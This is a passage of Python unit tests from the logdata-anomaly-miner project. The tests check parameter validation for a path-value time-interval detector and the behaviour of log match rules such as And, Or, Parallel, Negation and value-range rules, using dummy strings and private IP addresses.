        detector.counter_reduce_time_intervals = {('a',): 0}
        detector.appeared_time_list = {('a',): [3.0]}
        detector.remove_from_persistence_event("Analysis.PathValueTimeIntervalDetector", [["a"], 3.0])
        self.assertEqual(detector.counter_reduce_time_intervals, {('a',): 0})
        self.assertEqual(detector.appeared_time_list, {('a',): []})

    def test6validate_parameters(self):
        """Test all initialization parameters for the detector. Input parameters must be validated in the class.

        Each parameter is probed with a set of wrong types (TypeError) and out-of-range values
        (ValueError), followed by the accepted values. The checks run in the same order as the
        parameters appear in the constructor.
        """
        handler = self.stream_printer_event_handler

        def rejects(exc, *args, **kwargs):
            # The constructor must refuse these arguments with exactly this exception type.
            self.assertRaises(exc, PathValueTimeIntervalDetector, self.aminer_config, *args, **kwargs)

        def rejects_kw(exc, **kwargs):
            # Same as rejects(), with valid handler and target path list already supplied.
            rejects(exc, [handler], ["/model/value"], **kwargs)

        def accepts_kw(**kwargs):
            # Construction must succeed with these keyword arguments.
            PathValueTimeIntervalDetector(self.aminer_config, [handler], ["/model/value"], **kwargs)

        # anomaly_event_handlers
        for bad in (["default"], None, "", b"Default", True, 123, 123.3, {"id": "Default"}, (), set()):
            rejects(TypeError, bad, ["/model/value"])
        # target_path_list
        rejects(ValueError, [handler], [""])
        rejects(TypeError, [handler], [None])
        rejects(ValueError, [handler], None)
        for bad in ("", b"Default", True, 123, 123.3, {"id": "Default"}, (), set()):
            rejects(TypeError, [handler], bad)
        # persistence_id
        rejects_kw(ValueError, persistence_id="")
        for bad in (None, b"Default", True, 123, 123.22, {"id": "Default"}, ["Default"], [], (), set()):
            rejects_kw(TypeError, persistence_id=bad)
        accepts_kw(persistence_id="Default")
        # allow_missing_values_flag
        for bad in (b"True", "True", 123, 123.22, {"id": "Default"}, ["Default"], [], (), set()):
            rejects_kw(TypeError, allow_missing_values_flag=bad)
        accepts_kw(allow_missing_values_flag=True)
        # ignore_list
        rejects_kw(ValueError, ignore_list=[""])
        for bad in ("", b"Default", True, 123, 123.3, {"id": "Default"}, (), set()):
            rejects_kw(TypeError, ignore_list=bad)
        accepts_kw(ignore_list=[])
        accepts_kw(ignore_list=None)
        # output_logline
        for bad in (None, b"True", "True", 123, 123.22, {"id": "Default"}, ["Default"], [], (), set()):
            rejects_kw(TypeError, output_logline=bad)
        accepts_kw(output_logline=True)
        # learn_mode
        for bad in (b"True", "True", 123, 123.22, {"id": "Default"}, ["Default"], [], (), set()):
            rejects_kw(TypeError, learn_mode=bad)
        accepts_kw(learn_mode=True)
        # strictly positive integer parameters: zero and negatives are ValueError, floats are TypeError
        for name in ("time_period_length", "max_time_diff", "num_reduce_time_list"):
            for bad in (-1, 0):
                rejects_kw(ValueError, **{name: bad})
            for bad in (100.22, b"Default", "123", {"id": "Default"}, ["Default"], [], (), set()):
                rejects_kw(TypeError, **{name: bad})
            accepts_kw(**{name: 100})
        # learning stop conditions: strictly positive numbers, floats accepted, only checked with learn_mode=True
        for name in ("stop_learning_time", "stop_learning_no_anomaly_time"):
            for bad in (-1, 0):
                rejects_kw(ValueError, learn_mode=True, **{name: bad})
            for bad in (b"Default", "123", {"id": "Default"}, ["Default"], [], (), set()):
                rejects_kw(TypeError, learn_mode=True, **{name: bad})
            accepts_kw(learn_mode=True, **{name: 100})
            accepts_kw(learn_mode=True, **{name: 100.22})
        # both stop conditions at once are mutually exclusive
        rejects_kw(ValueError, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100)
        # log_resource_ignore_list: a bare filesystem path is rejected, the resource must be given as a file:// URI
        rejects_kw(ValueError, log_resource_ignore_list=["/tmp/syslog"])
        for bad in ("", b"Default", True, 123, 123.22, {"id": "Default"}, (), set()):
            rejects_kw(TypeError, log_resource_ignore_list=bad)
        accepts_kw(log_resource_ignore_list=["file:///tmp/syslog"])


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/RulesTest.py000066400000000000000000001757121500476301700261200ustar00rootroot00000000000000
import unittest
import math
from aminer.analysis.Rules import EventGenerationMatchAction, AtomFilterMatchAction, PathExistsMatchRule, ValueMatchRule, ValueListMatchRule, \
    ValueRangeMatchRule, StringRegexMatchRule, ModuloTimeMatchRule, ValueDependentModuloTimeMatchRule, IPv4InRFC1918MatchRule, \
    AndMatchRule, OrMatchRule, ParallelMatchRule, ValueDependentDelegatedMatchRule, NegationMatchRule
from aminer.parsing.ParserMatch import ParserMatch
from aminer.input.LogAtom import LogAtom
from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector
import re
from aminer.parsing.MatchElement import MatchElement
from time import time
from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyNumberModelElement
from datetime import datetime, timezone


class RuleTest(TestBase):
    """NOTE: DebugMatchRule and DebugHistoryMatchRule are intentionally not tested, as there is not much to be tested."""

    def test1EventGenerationMatchAction(self):
        """This test case checks if events are generated and pushed to all event handlers.

        The method body continues below this point.
        """
        expected_string = '%s This message was generated, when the unittest was successful.\n%s: "None" (%d lines)\n %s\n\n'
        message = "This message was generated, when the unittest was successful."
# NOTE(review): the statements up to the next "def" complete test1EventGenerationMatchAction; its signature and the locals `message` and `expected_string` are defined above this span.
        t = time()
        match_context = DummyMatchContext(b"25000")
        fdme = DummyFixedDataModelElement("s1", b"250")
        match_element = fdme.get_match_element("fixed", match_context)
        egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, message, [self.stream_printer_event_handler])
        log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), t, egma)
        egma.match_action(log_atom)
        # the handler must have printed exactly one event for the atom
        self.assertEqual(self.output_stream.getvalue(), expected_string % (
            datetime.fromtimestamp(t).strftime("%Y-%m-%d %H:%M:%S"), egma.__class__.__name__, 1,
            log_atom.parser_match.match_element.annotate_match("")))
        handler = self.stream_printer_event_handler
        # first argument (event id): empty string is a ValueError, anything but str a TypeError
        self.assertRaises(ValueError, EventGenerationMatchAction, "", message, [handler])
        for bad in (b"Test", 123, 123.2, True, None, {"id": "Default"}, ["Test.%s" % self.__class__.__name__], (), set()):
            self.assertRaises(TypeError, EventGenerationMatchAction, bad, message, [handler])
        # second argument (message): must be str, the empty string is accepted
        for bad in (message.encode(), 123, 123.2, True, None, {"id": "Default"}, [message], (), set()):
            self.assertRaises(TypeError, EventGenerationMatchAction, "Test", bad, [handler])
        EventGenerationMatchAction("Test", "", [handler])
        # third argument (event handlers): empty list is a ValueError, non-list or wrong element type a TypeError
        self.assertRaises(ValueError, EventGenerationMatchAction, "Test", message, [])
        for bad in (["default"], None, "", b"Default", True, 123, 123.3, {"id": "Default"}, set(), ()):
            self.assertRaises(TypeError, EventGenerationMatchAction, "Test", message, bad)

    def test2AtomFilterMatchAction(self):
        """This test case proves the functionality of the AtomFilterMatchAction.

        A matching atom is forwarded to the wrapped detector, and both constructor arguments
        are validated for type.
        """
        t = time()
        match_context = DummyMatchContext(b"25000")
        fdme = DummyFixedDataModelElement("s1", b"25000")
        match_element = fdme.get_match_element("fixed", match_context)
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False)
        afma = AtomFilterMatchAction([nmpd], True)
        log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, afma)
        self.assertTrue(afma.match_action(log_atom))
        # first argument: a list of detectors; an empty list and None are accepted, other types are not
        for bad in ("", ["default"], True, b"Default", 123, 123.3, {"id": "Default"}, set(), ()):
            self.assertRaises(TypeError, AtomFilterMatchAction, bad, True)
        AtomFilterMatchAction([], True)
        AtomFilterMatchAction(None, True)
        # second argument: must be a bool
        for bad in (b"True", "True", 123, 123.22, {"id": "Default"}, ["Default"], [], (), set()):
            self.assertRaises(TypeError, AtomFilterMatchAction, [nmpd], bad)

    def test3AndMatchRule(self):
        """Test the AndMatchRule.

        The rule only matches when every sub-rule matches: the path must exist AND hold an
        RFC1918 address. Constructor arguments are validated afterwards.
        """
        t = time()
        match_ipv4 = "match/IPv4"
        pemr_ipv4 = PathExistsMatchRule(match_ipv4, None)
        pemr_ipv6 = PathExistsMatchRule("match/IPv6", None)
        ipv4mr = IPv4InRFC1918MatchRule(match_ipv4)
        fdme_v4 = DummyFixedDataModelElement("IPv4", b"192.168.0.0")
        fdme_v6 = DummyFixedDataModelElement("IPv6", b"2001:4860:4860::8888")

        def evaluate(rule, element, raw_data, match_object):
            # Build a LogAtom whose match element reports match_object and run the rule on it.
            context = DummyMatchContext(raw_data)
            element_match = element.get_match_element("match", context)
            element_match.match_object = match_object
            return rule.match(LogAtom(element_match.match_string, ParserMatch(element_match), t, rule))

        private_v4 = (fdme_v4, b"192.168.0.0", 3232235520)
        public_v6 = (fdme_v6, b"2001:4860:4860::8888", 301989888)
        self.assertTrue(evaluate(AndMatchRule([pemr_ipv4, ipv4mr]), *private_v4))
        self.assertFalse(evaluate(AndMatchRule([pemr_ipv6, ipv4mr]), *private_v4))
        self.assertFalse(evaluate(AndMatchRule([pemr_ipv6, ipv4mr]), *public_v6))
        self.assertFalse(evaluate(AndMatchRule([pemr_ipv4, ipv4mr]), *public_v6))
        # first argument: a list of at least two rules
        self.assertRaises(ValueError, AndMatchRule, [pemr_ipv6])
        self.assertRaises(ValueError, AndMatchRule, [])
        for bad in (["default"], "default", b"default", True, 123, 123.22, {"id": "Default"}, (), set(), None):
            self.assertRaises(TypeError, AndMatchRule, bad)
        # second argument: a match action; other types are rejected
        for bad in (b"True", "True", 123, 123.22, {"id": "Default"}, ["Default"], [], (), set()):
            self.assertRaises(TypeError, AndMatchRule, [pemr_ipv6, ipv4mr], bad)
        egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler])
        AndMatchRule([pemr_ipv6, ipv4mr], egma)

    def test4OrMatchRule(self):
        """Test the OrMatchRule.

        The rule matches as soon as one sub-rule matches; only the combination where neither
        the path exists nor the value is an RFC1918 address yields False.
        """
        t = time()
        match_ipv4 = "match/IPv4"
        pemr_ipv4 = PathExistsMatchRule(match_ipv4, None)
        pemr_ipv6 = PathExistsMatchRule("match/IPv6", None)
        ipv4mr = IPv4InRFC1918MatchRule(match_ipv4)
        fdme_v4 = DummyFixedDataModelElement("IPv4", b"192.168.0.0")
        fdme_v6 = DummyFixedDataModelElement("IPv6", b"2001:4860:4860::8888")

        def evaluate(rule, element, raw_data, match_object):
            # Build a LogAtom whose match element reports match_object and run the rule on it.
            context = DummyMatchContext(raw_data)
            element_match = element.get_match_element("match", context)
            element_match.match_object = match_object
            return rule.match(LogAtom(element_match.match_string, ParserMatch(element_match), t, rule))

        private_v4 = (fdme_v4, b"192.168.0.0", 3232235520)
        public_v6 = (fdme_v6, b"2001:4860:4860::8888", 301989888)
        self.assertTrue(evaluate(OrMatchRule([pemr_ipv4, ipv4mr]), *private_v4))
        self.assertTrue(evaluate(OrMatchRule([pemr_ipv6, ipv4mr]), *private_v4))
        self.assertTrue(evaluate(OrMatchRule([pemr_ipv6, ipv4mr]), *public_v6))
        self.assertFalse(evaluate(OrMatchRule([pemr_ipv4, ipv4mr]), *public_v6))
        # first argument: a list of at least two rules
        self.assertRaises(ValueError, OrMatchRule, [pemr_ipv6])
        self.assertRaises(ValueError, OrMatchRule, [])
        for bad in (["default"], "default", b"default", True, 123, 123.22, {"id": "Default"}, (), set(), None):
            self.assertRaises(TypeError, OrMatchRule, bad)
        # second argument: a match action; other types are rejected
        for bad in (b"True", "True", 123, 123.22, {"id": "Default"}, ["Default"], [], (), set()):
            self.assertRaises(TypeError, OrMatchRule, [pemr_ipv6, ipv4mr], bad)
        egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler])
        OrMatchRule([pemr_ipv6, ipv4mr], egma)

    def test5ParallelMatchRule(self):
        """Test the ParallelMatchRule."""
        # NOTE(review): this method continues past the end of this span; the statements below are kept as written.
        t = time()
        match_ipv4 = "match/IPv4"
        pemr_ipv4 = PathExistsMatchRule(match_ipv4, None)
        pemr_ipv6 = PathExistsMatchRule("match/IPv6", None)
        ipv4mr = IPv4InRFC1918MatchRule(match_ipv4)
        omr = 
ParallelMatchRule([pemr_ipv4, ipv4mr]) fdme_v4 = DummyFixedDataModelElement("IPv4", b"192.168.0.0") fdme_v6 = DummyFixedDataModelElement("IPv6", b"2001:4860:4860::8888") match_context = DummyMatchContext(b"192.168.0.0") match_element = fdme_v4.get_match_element("match", match_context) match_element.match_object = 3232235520 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, omr) self.assertTrue(omr.match(log_atom)) omr = ParallelMatchRule([pemr_ipv6, ipv4mr]) match_context = DummyMatchContext(b"192.168.0.0") match_element = fdme_v4.get_match_element("match", match_context) match_element.match_object = 3232235520 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, omr) self.assertTrue(omr.match(log_atom)) omr = ParallelMatchRule([pemr_ipv6, ipv4mr]) match_context = DummyMatchContext(b"2001:4860:4860::8888") match_element = fdme_v6.get_match_element("match", match_context) match_element.match_object = 301989888 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, omr) self.assertTrue(omr.match(log_atom)) omr = ParallelMatchRule([pemr_ipv4, ipv4mr]) match_context = DummyMatchContext(b"2001:4860:4860::8888") match_element = fdme_v6.get_match_element("match", match_context) match_element.match_object = 301989888 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, omr) self.assertFalse(omr.match(log_atom)) self.assertRaises(ValueError, ParallelMatchRule, [pemr_ipv6]) self.assertRaises(ValueError, ParallelMatchRule, []) self.assertRaises(TypeError, ParallelMatchRule, ["default"]) self.assertRaises(TypeError, ParallelMatchRule, "default") self.assertRaises(TypeError, ParallelMatchRule, b"default") self.assertRaises(TypeError, ParallelMatchRule, True) self.assertRaises(TypeError, ParallelMatchRule, 123) self.assertRaises(TypeError, ParallelMatchRule, 123.22) self.assertRaises(TypeError, ParallelMatchRule, {"id": "Default"}) self.assertRaises(TypeError, ParallelMatchRule, 
()) self.assertRaises(TypeError, ParallelMatchRule, set()) self.assertRaises(TypeError, ParallelMatchRule, None) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], b"True") self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], "True") self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], 123) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], 123.22) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], {"id": "Default"}) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], ["Default"]) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], []) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], ()) self.assertRaises(TypeError, ParallelMatchRule, [pemr_ipv6, ipv4mr], set()) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) ParallelMatchRule([pemr_ipv6, ipv4mr], egma) def test6ValueDependentDelegatedMatchRule(self): """Test the ValueDependentDelegatedMatchRule.""" match_any = "match/any" match_ipv4 = "match/IPv4" alphabet = b"There are 26 letters in the english alphabet" srmr = StringRegexMatchRule(match_any, re.compile(rb"\w"), None) fdme1 = DummyFixedDataModelElement("any", alphabet) fdme2 = DummyFixedDataModelElement("any", b".There are 26 letters in the english alphabet") ipv4mr = IPv4InRFC1918MatchRule(match_ipv4) fdme3 = DummyFixedDataModelElement("IPv4", b"192.168.0.0") fdme4 = DummyFixedDataModelElement("IPv4", b"192.168.0.1") vddmr = ValueDependentDelegatedMatchRule([match_any, match_ipv4], {(alphabet,): srmr, (3232235520,): ipv4mr}) match_context = DummyMatchContext(alphabet) match_element = fdme1.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, vddmr) self.assertTrue(vddmr.match(log_atom)) match_context = DummyMatchContext(b"192.168.0.0") match_element = fdme3.get_match_element("match", 
match_context) match_element.match_object = 3232235520 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, vddmr) self.assertTrue(vddmr.match(log_atom)) match_context = DummyMatchContext(b".There are 26 letters in the english alphabet") match_element = fdme2.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, vddmr) self.assertFalse(vddmr.match(log_atom)) match_context = DummyMatchContext(b"192.168.0.1") match_element = fdme4.get_match_element("match", match_context) match_element.match_object = 3232235521 log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, vddmr) self.assertFalse(vddmr.match(log_atom)) self.assertRaises(ValueError, ValueDependentDelegatedMatchRule, [], {(alphabet,): srmr}) self.assertRaises(ValueError, ValueDependentDelegatedMatchRule, [""], {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, [srmr], {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, [b"default"], {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, "default", {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, b"default", {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, True, {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, 123, {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, 123.22, {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, {"id": "Default"}, {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, (), {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, set(), {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, None, {(alphabet,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, 
["default"], {"default": srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {True: srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {123: srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {123.22: srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(): srmr}) ValueDependentDelegatedMatchRule(["default"], {("default",): srmr}) ValueDependentDelegatedMatchRule(["default"], {(b"default",): srmr}) ValueDependentDelegatedMatchRule(["default"], {(123,): srmr}) ValueDependentDelegatedMatchRule(["default"], {(123.2,): srmr}) ValueDependentDelegatedMatchRule(["default"], {(True,): srmr}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule=b"default") self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule="default") self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule=True) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule=123) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule=123.3) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule={"id": "Default"}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule=()) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, default_rule=set()) ValueDependentDelegatedMatchRule(["default"], {("default",): srmr}, default_rule=srmr) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=b"default") self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action="default") 
self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=True) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=123) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=123.3) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action={"id": "Default"}) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=()) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=[]) self.assertRaises(TypeError, ValueDependentDelegatedMatchRule, ["default"], {(alphabet,): srmr}, match_action=set()) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) ValueDependentDelegatedMatchRule(["default"], {("default",): srmr}, match_action=egma) def test7NegationMatchRule(self): """This case unit the NegationMatchRule.""" match_s1 = "match/s1" fixed_string = b"fixed String" pemr = PathExistsMatchRule(match_s1, None) nmr = NegationMatchRule(pemr) fdme = DummyFixedDataModelElement("s1", fixed_string) match_context = DummyMatchContext(fixed_string) match_element = fdme.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), 1, pemr) self.assertTrue(pemr.match(log_atom)) self.assertFalse(nmr.match(log_atom)) self.assertRaises(TypeError, NegationMatchRule, b"default") self.assertRaises(TypeError, NegationMatchRule, "default") self.assertRaises(TypeError, NegationMatchRule, True) self.assertRaises(TypeError, NegationMatchRule, 123) self.assertRaises(TypeError, NegationMatchRule, 123.3) self.assertRaises(TypeError, NegationMatchRule, {"id": "Default"}) self.assertRaises(TypeError, NegationMatchRule, ()) self.assertRaises(TypeError, NegationMatchRule, 
[]) self.assertRaises(TypeError, NegationMatchRule, set()) self.assertRaises(TypeError, NegationMatchRule, None) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=b"default") self.assertRaises(TypeError, NegationMatchRule, pemr, match_action="default") self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=True) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=123) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=123.3) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action={"id": "Default"}) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=()) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=set()) self.assertRaises(TypeError, NegationMatchRule, pemr, match_action=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) NegationMatchRule(pemr, egma) def test8PathExistsMatchRule(self): """Test the PathExistsMatchRule.""" t = time() match_s1 = "match/s1" data = b"fixed String" pemr = PathExistsMatchRule(match_s1, None) fdme1 = DummyFixedDataModelElement("s1", data) fdme2 = DummyFixedDataModelElement("s2", data) match_context = DummyMatchContext(data) match_element = fdme1.get_match_element("match", match_context) log_atom1 = LogAtom(match_element.match_string, ParserMatch(match_element), t, pemr) self.assertTrue(pemr.match(log_atom1)) match_context = DummyMatchContext(data) match_element = fdme2.get_match_element("match", match_context) log_atom2 = LogAtom(match_element.match_string, ParserMatch(match_element), t, pemr) self.assertFalse(pemr.match(log_atom2)) self.assertRaises(ValueError, PathExistsMatchRule, "") self.assertRaises(TypeError, PathExistsMatchRule, b"default") self.assertRaises(TypeError, PathExistsMatchRule, True) self.assertRaises(TypeError, PathExistsMatchRule, 123) self.assertRaises(TypeError, PathExistsMatchRule, 123.3) self.assertRaises(TypeError, PathExistsMatchRule, {"id": 
"Default"}) self.assertRaises(TypeError, PathExistsMatchRule, ()) self.assertRaises(TypeError, PathExistsMatchRule, []) self.assertRaises(TypeError, PathExistsMatchRule, set()) self.assertRaises(TypeError, PathExistsMatchRule, None) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=b"default") self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action="default") self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=True) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=123) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=123.3) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action={"id": "Default"}) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=()) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=set()) self.assertRaises(TypeError, PathExistsMatchRule, "default", match_action=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) PathExistsMatchRule("default", egma) def test9ValueMatchRule(self): """Test the ValueMatchRule.""" data1 = b"fixed String" data2 = b"another fixed String" vmr = ValueMatchRule("match/s1", data1, None) fdme1 = DummyFixedDataModelElement("s1", data1) fdme2 = DummyFixedDataModelElement("s1", data2) match_context = DummyMatchContext(data1) match_element = fdme1.get_match_element("match", match_context) log_atom1 = LogAtom(match_element.match_string, ParserMatch(match_element), 1, vmr) self.assertTrue(vmr.match(log_atom1)) match_context = DummyMatchContext(data2) match_element = fdme2.get_match_element("match", match_context) log_atom2 = LogAtom(match_element.match_string, ParserMatch(match_element), 1, vmr) self.assertFalse(vmr.match(log_atom2)) self.assertRaises(ValueError, ValueMatchRule, "", b"value") self.assertRaises(TypeError, ValueMatchRule, b"default", b"value") self.assertRaises(TypeError, 
ValueMatchRule, True, b"value") self.assertRaises(TypeError, ValueMatchRule, 123, b"value") self.assertRaises(TypeError, ValueMatchRule, 123.3, b"value") self.assertRaises(TypeError, ValueMatchRule, {"id": "Default"}, b"value") self.assertRaises(TypeError, ValueMatchRule, (), b"value") self.assertRaises(TypeError, ValueMatchRule, [], b"value") self.assertRaises(TypeError, ValueMatchRule, set(), b"value") self.assertRaises(TypeError, ValueMatchRule, None, b"value") self.assertRaises(ValueError, ValueMatchRule, "default", b"") self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=b"default") self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action="default") self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=True) self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=123) self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=123.3) self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action={"id": "Default"}) self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=()) self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=set()) self.assertRaises(TypeError, ValueMatchRule, "default", b"value", match_action=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) ValueMatchRule("default", b"value", egma) def test10ValueListMatchRule(self): """Test the ValueListMatchRule.""" vlmr = ValueListMatchRule("match/d1", [1, 2, 4, 8, 16, 32, 64, 128, 256, 512], None) nme = DummyNumberModelElement("d1") match_context = DummyMatchContext(b"64") match_element = nme.get_match_element("match", match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, vlmr) self.assertTrue(vlmr.match(log_atom)) match_context = DummyMatchContext(b"4711") match_element = nme.get_match_element("match", match_context) log_atom 
= LogAtom(match_context.match_data, ParserMatch(match_element), 1, vlmr) self.assertFalse(vlmr.match(log_atom)) self.assertRaises(ValueError, ValueListMatchRule, "", [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, b"default", [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, True, [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, 123, [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, 123.3, [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, {"id": "Default"}, [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, (), [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, [], [b"value"]) self.assertRaises(TypeError, ValueListMatchRule, set(), [b"value"]) self.assertRaises(ValueError, ValueListMatchRule, "default", []) self.assertRaises(ValueError, ValueListMatchRule, "default", [""]) self.assertRaises(TypeError, ValueListMatchRule, "default", b"default") self.assertRaises(TypeError, ValueListMatchRule, "default", "default") self.assertRaises(TypeError, ValueListMatchRule, "default", True) self.assertRaises(TypeError, ValueListMatchRule, "default", 123) self.assertRaises(TypeError, ValueListMatchRule, "default", 123.3) self.assertRaises(TypeError, ValueListMatchRule, "default", {"id": "Default"}) self.assertRaises(TypeError, ValueListMatchRule, "default", ()) self.assertRaises(TypeError, ValueListMatchRule, "default", set()) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=b"default") self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action="default") self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=True) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=123) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=123.3) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action={"id": "Default"}) 
self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=()) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=set()) self.assertRaises(TypeError, ValueListMatchRule, "default", [b"value"], match_action=[]) egma = EventGenerationMatchAction("Test.%s" % self.__class__.__name__, "", [self.stream_printer_event_handler]) ValueListMatchRule("default", [b"value"], egma) def test11ValueRangeMatchRule(self): """Test the ValueRangeMatchRule.""" vrmr = ValueRangeMatchRule("match/d1", 1, 1000, None) nme = DummyNumberModelElement("d1") match_context = DummyMatchContext(b"1") match_element = nme.get_match_element("match", match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, vrmr) self.assertTrue(vrmr.match(log_atom)) match_context = DummyMatchContext(b"1000") match_element = nme.get_match_element("match", match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, vrmr) self.assertTrue(vrmr.match(log_atom)) match_context = DummyMatchContext(b"0") match_element = nme.get_match_element("match", match_context) log_atom = LogAtom(match_context.match_data, ParserMatch(match_element), 1, vrmr) self.assertFalse(vrmr.match(log_atom)) match_context = DummyMatchContext(b"1001") match_element = 